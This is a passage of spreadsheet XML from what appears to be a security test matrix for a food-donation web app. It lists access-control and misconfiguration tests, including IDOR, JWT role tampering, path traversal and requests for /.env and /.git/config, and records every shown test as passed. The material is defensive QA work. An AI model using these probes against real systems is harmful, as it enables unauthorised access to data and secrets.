          <t>CSRF Token Validation Disablement Check</t>
        </is>
      </c>
      <c r="D148" s="16" t="inlineStr">
        <is>
          <t>Omit CSRF token header in state-changing POST request</t>
        </is>
      </c>
      <c r="E148" s="16" t="inlineStr">
        <is>
          <t>Missing CSRF token</t>
        </is>
      </c>
      <c r="F148" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G148" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H148" s="16" t="inlineStr">
        <is>
          <t>Server rejects request with 403 Invalid CSRF Token</t>
        </is>
      </c>
    </row>
    <row r="149" ht="22" customHeight="1">
      <c r="A149" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-023</t>
        </is>
      </c>
      <c r="B149" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C149" s="16" t="inlineStr">
        <is>
          <t>CSRF Token Binding to User Session</t>
        </is>
      </c>
      <c r="D149" s="16" t="inlineStr">
        <is>
          <t>Use valid CSRF token from User A in User B session</t>
        </is>
      </c>
      <c r="E149" s="16" t="inlineStr">
        <is>
          <t>Cross-user CSRF token</t>
        </is>
      </c>
      <c r="F149" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G149" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H149" s="16" t="inlineStr">
        <is>
          <t>CSRF token cryptographically bound to session ID; Validation fails</t>
        </is>
      </c>
    </row>
    <row r="150" ht="22" customHeight="1">
      <c r="A150" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-024</t>
        </is>
      </c>
      <c r="B150" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C150" s="16" t="inlineStr">
        <is>
          <t>API Path Traversal via Matrix Parameters</t>
        </is>
      </c>
      <c r="D150" s="16" t="inlineStr">
        <is>
          <t>Request GET /api/v1/users;matrix=1/../admin</t>
        </is>
      </c>
      <c r="E150" s="16" t="inlineStr">
        <is>
          <t>Matrix parameter traversal</t>
        </is>
      </c>
      <c r="F150" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G150" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H150" s="16" t="inlineStr">
        <is>
          <t>Matrix parameters disabled; Path normalized before routing</t>
        </is>
      </c>
    </row>
    <row r="151" ht="22" customHeight="1">
      <c r="A151" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-025</t>
        </is>
      </c>
      <c r="B151" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C151" s="16" t="inlineStr">
        <is>
          <t>WebSockets Access Control Verification</t>
        </is>
      </c>
      <c r="D151" s="16" t="inlineStr">
        <is>
          <t>Connect to ws://sharebite.org/ws without authentication token</t>
        </is>
      </c>
      <c r="E151" s="16" t="inlineStr">
        <is>
          <t>Unauthenticated WebSocket</t>
        </is>
      </c>
      <c r="F151" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G151" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H151" s="16" t="inlineStr">
        <is>
          <t>WebSocket handshake requires valid JWT query param / header; Disconnected</t>
        </is>
      </c>
    </row>
    <row r="152" ht="22" customHeight="1">
      <c r="A152" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-026</t>
        </is>
      </c>
      <c r="B152" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C152" s="16" t="inlineStr">
        <is>
          <t>IDOR on Food Donation Deletion</t>
        </is>
      </c>
      <c r="D152" s="16" t="inlineStr">
        <is>
          <t>DELETE /api/donations/don_123 belonging to another donor</t>
        </is>
      </c>
      <c r="E152" s="16" t="inlineStr">
        <is>
          <t>DELETE donation IDOR</t>
        </is>
      </c>
      <c r="F152" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G152" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H152" s="16" t="inlineStr">
        <is>
          <t>Ownership verified in database transaction; 403 Forbidden</t>
        </is>
      </c>
    </row>
    <row r="153" ht="22" customHeight="1">
      <c r="A153" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-027</t>
        </is>
      </c>
      <c r="B153" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C153" s="16" t="inlineStr">
        <is>
          <t>Access Control Enforcement on Static Assets</t>
        </is>
      </c>
      <c r="D153" s="16" t="inlineStr">
        <is>
          <t>Request private invoice PDF at /uploads/invoices/inv_999.pdf</t>
        </is>
      </c>
      <c r="E153" s="16" t="inlineStr">
        <is>
          <t>Direct static PDF request</t>
        </is>
      </c>
      <c r="F153" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G153" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H153" s="16" t="inlineStr">
        <is>
          <t>Upload directory protected by access middleware; Direct file access denied</t>
        </is>
      </c>
    </row>
    <row r="154" ht="22" customHeight="1">
      <c r="A154" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-028</t>
        </is>
      </c>
      <c r="B154" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C154" s="16" t="inlineStr">
        <is>
          <t>API Endpoint Exposure via HTTP OPTIONS Method</t>
        </is>
      </c>
      <c r="D154" s="16" t="inlineStr">
        <is>
          <t>Send OPTIONS /api/admin/users</t>
        </is>
      </c>
      <c r="E154" s="16" t="inlineStr">
        <is>
          <t>OPTIONS request check</t>
        </is>
      </c>
      <c r="F154" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G154" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H154" s="16" t="inlineStr">
        <is>
          <t>OPTIONS returns allowed methods without exposing sensitive schema data</t>
        </is>
      </c>
    </row>
    <row r="155" ht="22" customHeight="1">
      <c r="A155" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-029</t>
        </is>
      </c>
      <c r="B155" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C155" s="16" t="inlineStr">
        <is>
          <t>Privilege Escalation via JWT Claim Modification</t>
        </is>
      </c>
      <c r="D155" s="16" t="inlineStr">
        <is>
          <t>Tamper JWT payload claim {"role": "ADMIN"} with valid secret key</t>
        </is>
      </c>
      <c r="E155" s="16" t="inlineStr">
        <is>
          <t>JWT role tampering</t>
        </is>
      </c>
      <c r="F155" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G155" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H155" s="16" t="inlineStr">
        <is>
          <t>Signature verification fails unless signed by private key; 401 Returned</t>
        </is>
      </c>
    </row>
    <row r="156" ht="22" customHeight="1">
      <c r="A156" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-030</t>
        </is>
      </c>
      <c r="B156" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C156" s="16" t="inlineStr">
        <is>
          <t>Restricted API Method Disablement</t>
        </is>
      </c>
      <c r="D156" s="16" t="inlineStr">
        <is>
          <t>Send TRACE or TRACK request to server</t>
        </is>
      </c>
      <c r="E156" s="16" t="inlineStr">
        <is>
          <t>TRACE / TRACK requests</t>
        </is>
      </c>
      <c r="F156" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G156" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H156" s="16" t="inlineStr">
        <is>
          <t>TRACE and TRACK HTTP methods disabled; Returns 405 Method Not Allowed</t>
        </is>
      </c>
    </row>
    <row r="157" ht="22" customHeight="1">
      <c r="A157" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-031</t>
        </is>
      </c>
      <c r="B157" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C157" s="16" t="inlineStr">
        <is>
          <t>IDOR on Export PDF Report URI</t>
        </is>
      </c>
      <c r="D157" s="16" t="inlineStr">
        <is>
          <t>Request GET /api/reports/export/rep_999</t>
        </is>
      </c>
      <c r="E157" s="16" t="inlineStr">
        <is>
          <t>Export report IDOR</t>
        </is>
      </c>
      <c r="F157" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G157" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H157" s="16" t="inlineStr">
        <is>
          <t>Report ownership verified against requesting session user</t>
        </is>
      </c>
    </row>
    <row r="158" ht="22" customHeight="1">
      <c r="A158" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-032</t>
        </is>
      </c>
      <c r="B158" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C158" s="16" t="inlineStr">
        <is>
          <t>IDOR on User Notification Preferences</t>
        </is>
      </c>
      <c r="D158" s="16" t="inlineStr">
        <is>
          <t>Update notification settings for target user ID</t>
        </is>
      </c>
      <c r="E158" s="16" t="inlineStr">
        <is>
          <t>Notification IDOR</t>
        </is>
      </c>
      <c r="F158" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G158" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H158" s="16" t="inlineStr">
        <is>
          <t>User ID derived from validated session token exclusively</t>
        </is>
      </c>
    </row>
    <row r="159" ht="22" customHeight="1">
      <c r="A159" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-033</t>
        </is>
      </c>
      <c r="B159" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C159" s="16" t="inlineStr">
        <is>
          <t>Horizontal Privilege Escalation on Analytics API</t>
        </is>
      </c>
      <c r="D159" s="16" t="inlineStr">
        <is>
          <t>Request analytics dashboard data for another org</t>
        </is>
      </c>
      <c r="E159" s="16" t="inlineStr">
        <is>
          <t>Org Analytics IDOR</t>
        </is>
      </c>
      <c r="F159" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G159" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H159" s="16" t="inlineStr">
        <is>
          <t>Organization ID scoped to authenticated user membership</t>
        </is>
      </c>
    </row>
    <row r="160" ht="22" customHeight="1">
      <c r="A160" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-034</t>
        </is>
      </c>
      <c r="B160" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C160" s="16" t="inlineStr">
        <is>
          <t>Vertical Escalation via Custom Header Manipulation</t>
        </is>
      </c>
      <c r="D160" s="16" t="inlineStr">
        <is>
          <t>Inject X-User-Role: ADMIN header in request</t>
        </is>
      </c>
      <c r="E160" s="16" t="inlineStr">
        <is>
          <t>Role Header Spoofing</t>
        </is>
      </c>
      <c r="F160" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G160" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H160" s="16" t="inlineStr">
        <is>
          <t>User role loaded from signed session/JWT; Header override ignored</t>
        </is>
      </c>
    </row>
    <row r="161" ht="22" customHeight="1">
      <c r="A161" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-035</t>
        </is>
      </c>
      <c r="B161" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C161" s="16" t="inlineStr">
        <is>
          <t>IDOR on Saved Meal Recommendations</t>
        </is>
      </c>
      <c r="D161" s="16" t="inlineStr">
        <is>
          <t>Delete saved recommendation ID belonging to another user</t>
        </is>
      </c>
      <c r="E161" s="16" t="inlineStr">
        <is>
          <t>Delete Recommendation IDOR</t>
        </is>
      </c>
      <c r="F161" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G161" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H161" s="16" t="inlineStr">
        <is>
          <t>Ownership check enforced prior to deletion operation</t>
        </is>
      </c>
    </row>
    <row r="162" ht="22" customHeight="1">
      <c r="A162" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-001</t>
        </is>
      </c>
      <c r="B162" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C162" s="16" t="inlineStr">
        <is>
          <t>Content Security Policy (CSP) Header Enforcement</t>
        </is>
      </c>
      <c r="D162" s="16" t="inlineStr">
        <is>
          <t>Inspect response headers for Content-Security-Policy</t>
        </is>
      </c>
      <c r="E162" s="16" t="inlineStr">
        <is>
          <t>CSP Header Check</t>
        </is>
      </c>
      <c r="F162" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G162" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H162" s="16" t="inlineStr">
        <is>
          <t>CSP Header present: default-src 'self'; script-src 'self'; object-src 'none'</t>
        </is>
      </c>
    </row>
    <row r="163" ht="22" customHeight="1">
      <c r="A163" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-002</t>
        </is>
      </c>
      <c r="B163" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C163" s="16" t="inlineStr">
        <is>
          <t>X-Content-Type-Options Header Verification</t>
        </is>
      </c>
      <c r="D163" s="16" t="inlineStr">
        <is>
          <t>Inspect response headers for MIME-sniffing protection</t>
        </is>
      </c>
      <c r="E163" s="16" t="inlineStr">
        <is>
          <t>MIME protection check</t>
        </is>
      </c>
      <c r="F163" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G163" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H163" s="16" t="inlineStr">
        <is>
          <t>X-Content-Type-Options: nosniff present on all HTTP responses</t>
        </is>
      </c>
    </row>
    <row r="164" ht="22" customHeight="1">
      <c r="A164" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-003</t>
        </is>
      </c>
      <c r="B164" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C164" s="16" t="inlineStr">
        <is>
          <t>X-Frame-Options Header Verification</t>
        </is>
      </c>
      <c r="D164" s="16" t="inlineStr">
        <is>
          <t>Inspect response headers for clickjacking protection</t>
        </is>
      </c>
      <c r="E164" s="16" t="inlineStr">
        <is>
          <t>Clickjacking header check</t>
        </is>
      </c>
      <c r="F164" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G164" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H164" s="16" t="inlineStr">
        <is>
          <t>X-Frame-Options: DENY (or SAMEORIGIN) present</t>
        </is>
      </c>
    </row>
    <row r="165" ht="22" customHeight="1">
      <c r="A165" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-004</t>
        </is>
      </c>
      <c r="B165" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C165" s="16" t="inlineStr">
        <is>
          <t>X-XSS-Protection Header Verification</t>
        </is>
      </c>
      <c r="D165" s="16" t="inlineStr">
        <is>
          <t>Inspect legacy browser XSS protection header</t>
        </is>
      </c>
      <c r="E165" s="16" t="inlineStr">
        <is>
          <t>XSS Header check</t>
        </is>
      </c>
      <c r="F165" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G165" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H165" s="16" t="inlineStr">
        <is>
          <t>X-XSS-Protection: 1; mode=block configured</t>
        </is>
      </c>
    </row>
    <row r="166" ht="22" customHeight="1">
      <c r="A166" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-005</t>
        </is>
      </c>
      <c r="B166" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C166" s="16" t="inlineStr">
        <is>
          <t>Referrer-Policy Header Enforcement</t>
        </is>
      </c>
      <c r="D166" s="16" t="inlineStr">
        <is>
          <t>Inspect HTTP Referrer-Policy header</t>
        </is>
      </c>
      <c r="E166" s="16" t="inlineStr">
        <is>
          <t>Referrer policy check</t>
        </is>
      </c>
      <c r="F166" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G166" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H166" s="16" t="inlineStr">
        <is>
          <t>Referrer-Policy: strict-origin-when-cross-origin configured</t>
        </is>
      </c>
    </row>
    <row r="167" ht="22" customHeight="1">
      <c r="A167" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-006</t>
        </is>
      </c>
      <c r="B167" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C167" s="16" t="inlineStr">
        <is>
          <t>Permissions-Policy (Feature-Policy) Header Audit</t>
        </is>
      </c>
      <c r="D167" s="16" t="inlineStr">
        <is>
          <t>Inspect browser feature restrictions in headers</t>
        </is>
      </c>
      <c r="E167" s="16" t="inlineStr">
        <is>
          <t>Permissions policy check</t>
        </is>
      </c>
      <c r="F167" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G167" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H167" s="16" t="inlineStr">
        <is>
          <t>Permissions-Policy restricts geolocation, camera, microphone to 'self'</t>
        </is>
      </c>
    </row>
    <row r="168" ht="22" customHeight="1">
      <c r="A168" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-007</t>
        </is>
      </c>
      <c r="B168" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C168" s="16" t="inlineStr">
        <is>
          <t>Default Server Welcome Page Disablement</t>
        </is>
      </c>
      <c r="D168" s="16" t="inlineStr">
        <is>
          <t>Request root URL / on raw Nginx/Apache server</t>
        </is>
      </c>
      <c r="E168" s="16" t="inlineStr">
        <is>
          <t>Server index check</t>
        </is>
      </c>
      <c r="F168" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G168" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H168" s="16" t="inlineStr">
        <is>
          <t>Default welcome pages removed; Serves application bundle</t>
        </is>
      </c>
    </row>
    <row r="169" ht="22" customHeight="1">
      <c r="A169" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-008</t>
        </is>
      </c>
      <c r="B169" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C169" s="16" t="inlineStr">
        <is>
          <t>HTTP Unnecessary Verb Disablement</t>
        </is>
      </c>
      <c r="D169" s="16" t="inlineStr">
        <is>
          <t>Send PUT, DELETE, CONNECT to static assets folder</t>
        </is>
      </c>
      <c r="E169" s="16" t="inlineStr">
        <is>
          <t>Unnecessary HTTP verbs</t>
        </is>
      </c>
      <c r="F169" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G169" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H169" s="16" t="inlineStr">
        <is>
          <t>Static file handler responds with 405 Method Not Allowed</t>
        </is>
      </c>
    </row>
    <row r="170" ht="22" customHeight="1">
      <c r="A170" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-009</t>
        </is>
      </c>
      <c r="B170" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C170" s="16" t="inlineStr">
        <is>
          <t>SSL TLS Fallback Attack (POODLE/SCSV) Defense</t>
        </is>
      </c>
      <c r="D170" s="16" t="inlineStr">
        <is>
          <t>Attempt TLS fallback to SSL 3.0 protocol</t>
        </is>
      </c>
      <c r="E170" s="16" t="inlineStr">
        <is>
          <t>TLS Fallback payload</t>
        </is>
      </c>
      <c r="F170" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G170" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H170" s="16" t="inlineStr">
        <is>
          <t>TLS_FALLBACK_SCSV supported; SSL 3.0 completely disabled</t>
        </is>
      </c>
    </row>
    <row r="171" ht="22" customHeight="1">
      <c r="A171" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-010</t>
        </is>
      </c>
      <c r="B171" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C171" s="16" t="inlineStr">
        <is>
          <t>Server Clock Synchronization (NTP) Verification</t>
        </is>
      </c>
      <c r="D171" s="16" t="inlineStr">
        <is>
          <t>Inspect server system timestamp accuracy</t>
        </is>
      </c>
      <c r="E171" s="16" t="inlineStr">
        <is>
          <t>NTP Sync Audit</t>
        </is>
      </c>
      <c r="F171" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G171" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H171" s="16" t="inlineStr">
        <is>
          <t>NTP daemon synchronized; System clock drift &lt; 100ms for audit logs</t>
        </is>
      </c>
    </row>
    <row r="172" ht="22" customHeight="1">
      <c r="A172" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-011</t>
        </is>
      </c>
      <c r="B172" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C172" s="16" t="inlineStr">
        <is>
          <t>Unused Service Port Disablement</t>
        </is>
      </c>
      <c r="D172" s="16" t="inlineStr">
        <is>
          <t>Scan server for open unnecessary ports (SSH 22, SMTP 25, Redis 6379)</t>
        </is>
      </c>
      <c r="E172" s="16" t="inlineStr">
        <is>
          <t>Port scan audit</t>
        </is>
      </c>
      <c r="F172" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G172" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H172" s="16" t="inlineStr">
        <is>
          <t>Firewall blocks external access to internal service ports</t>
        </is>
      </c>
    </row>
    <row r="173" ht="22" customHeight="1">
      <c r="A173" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-012</t>
        </is>
      </c>
      <c r="B173" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C173" s="16" t="inlineStr">
        <is>
          <t>Debug Mode Disablement in Production</t>
        </is>
      </c>
      <c r="D173" s="16" t="inlineStr">
        <is>
          <t>Inspect application responses for NODE_ENV = development flags</t>
        </is>
      </c>
      <c r="E173" s="16" t="inlineStr">
        <is>
          <t>Debug mode audit</t>
        </is>
      </c>
      <c r="F173" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G173" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H173" s="16" t="inlineStr">
        <is>
          <t>NODE_ENV=production set; Verbose debug logs disabled</t>
        </is>
      </c>
    </row>
    <row r="174" ht="22" customHeight="1">
      <c r="A174" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-013</t>
        </is>
      </c>
      <c r="B174" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C174" s="16" t="inlineStr">
        <is>
          <t>Error Page Information Leak Prevention</t>
        </is>
      </c>
      <c r="D174" s="16" t="inlineStr">
        <is>
          <t>Trigger 404 page for non-existent route /invalid-path-123</t>
        </is>
      </c>
      <c r="E174" s="16" t="inlineStr">
        <is>
          <t>Custom 404 check</t>
        </is>
      </c>
      <c r="F174" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G174" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H174" s="16" t="inlineStr">
        <is>
          <t>Clean custom 404 page displayed without framework/version footprint</t>
        </is>
      </c>
    </row>
    <row r="175" ht="22" customHeight="1">
      <c r="A175" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-014</t>
        </is>
      </c>
      <c r="B175" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C175" s="16" t="inlineStr">
        <is>
          <t>Cross-Domain Policy XML Disablement</t>
        </is>
      </c>
      <c r="D175" s="16" t="inlineStr">
        <is>
          <t>Request GET /crossdomain.xml or /clientaccesspolicy.xml</t>
        </is>
      </c>
      <c r="E175" s="16" t="inlineStr">
        <is>
          <t>Cross-domain XML request</t>
        </is>
      </c>
      <c r="F175" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G175" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H175" s="16" t="inlineStr">
        <is>
          <t>Flash/Silverlight cross-domain policy files absent / set to 'none'</t>
        </is>
      </c>
    </row>
    <row r="176" ht="22" customHeight="1">
      <c r="A176" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-015</t>
        </is>
      </c>
      <c r="B176" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C176" s="16" t="inlineStr">
        <is>
          <t>Git Repository Exposure Prevention</t>
        </is>
      </c>
      <c r="D176" s="16" t="inlineStr">
        <is>
          <t>Request GET /.git/config or /.gitignore</t>
        </is>
      </c>
      <c r="E176" s="16" t="inlineStr">
        <is>
          <t>Git folder request</t>
        </is>
      </c>
      <c r="F176" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G176" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H176" s="16" t="inlineStr">
        <is>
          <t>.git directory inaccessible; Web server returns 404 / 403</t>
        </is>
      </c>
    </row>
    <row r="177" ht="22" customHeight="1">
      <c r="A177" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-016</t>
        </is>
      </c>
      <c r="B177" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C177" s="16" t="inlineStr">
        <is>
          <t>Docker Container Security Hardening</t>
        </is>
      </c>
      <c r="D177" s="16" t="inlineStr">
        <is>
          <t>Inspect Docker container user permissions in deployment spec</t>
        </is>
      </c>
      <c r="E177" s="16" t="inlineStr">
        <is>
          <t>Docker user check</t>
        </is>
      </c>
      <c r="F177" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G177" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H177" s="16" t="inlineStr">
        <is>
          <t>Containers run as non-root unprivileged user (UID 10001)</t>
        </is>
      </c>
    </row>
    <row r="178" ht="22" customHeight="1">
      <c r="A178" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-017</t>
        </is>
      </c>
      <c r="B178" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C178" s="16" t="inlineStr">
        <is>
          <t>Read-Only Container Filesystem Enforcement</t>
        </is>
      </c>
      <c r="D178" s="16" t="inlineStr">
        <is>
          <t>Attempt write operation to container root filesystem</t>
        </is>
      </c>
      <c r="E178" s="16" t="inlineStr">
        <is>
          <t>Container write check</t>
        </is>
      </c>
      <c r="F178" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G178" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H178" s="16" t="inlineStr">
        <is>
          <t>Container root filesystem mounted read-only; Writes isolated to /tmp</t>
        </is>
      </c>
    </row>
    <row r="179" ht="22" customHeight="1">
      <c r="A179" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-018</t>
        </is>
      </c>
      <c r="B179" s="16" t="inlineStr">
        <is>
          <t>Security Misconfigurations</t>
        </is>
      </c>
      <c r="C179" s="16" t="inlineStr">
        <is>
          <t>Environment Variable File (.env) Protection</t>
        </is>
      </c>
      <c r="D179" s="16" t="inlineStr">
        <is>
          <t>Request GET /.env via HTTP protocol</t>
        </is>
      </c>
      <c r="E179" s="16" t="inlineStr">
        <is>
          <t>.env URL request</t>
        </is>
      </c>
      <c r="F179" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G179" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H179" s="16" t="inlineStr">
        <is>
          <t>.env file excluded from web build root; Direct access returns 404</t>
        </is>
      </c>
    </row>
    <row r="180" ht="22" customHeight="1">
      <c r="A180" s="15" t="inlineStr">
        <is>
          <t>SEC-CFG-019</t>
        </is>
